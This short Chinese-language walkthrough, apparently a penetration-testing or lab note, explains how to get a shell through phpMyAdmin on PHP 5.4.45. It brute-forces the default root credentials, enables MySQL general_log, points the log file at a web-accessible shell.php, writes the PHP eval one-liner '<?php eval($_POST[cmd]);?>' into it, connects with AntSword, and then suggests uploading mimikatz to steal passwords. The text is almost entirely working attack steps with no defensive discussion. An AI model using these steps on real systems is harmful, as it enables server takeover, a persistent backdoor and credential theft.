php版本5.4.45
默认账号密码都是root
常规思路应该是运用工具进行爆破
获得账号密码
进入phpmyadmin
这里可以通过phpinfo.php文件查看网站路径
select @@basedir可以看到mysql所在的绝对路径
编辑
检测全局变量
show variables like "gener%";
general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。
general log file 指的是日志的保存路径
由图可知general_log默认关闭,以及日志的存储路径
set global general_log = "on";
开启日志配置
set global general_log_file="E:/phpstudy/www/shell.php";
设置日志路径
写入成功
写入一句话到日志里
再次访问
因为开启了日志记录功能,所执行的sql语句都会被记录在日志中
select '<?php eval($_POST[cmd]);?>'
直接执行这句话也可以
两者皆可
直接用蚁剑连接
getshell成功 编辑
编辑
之后就可以上传mimikatz获取密码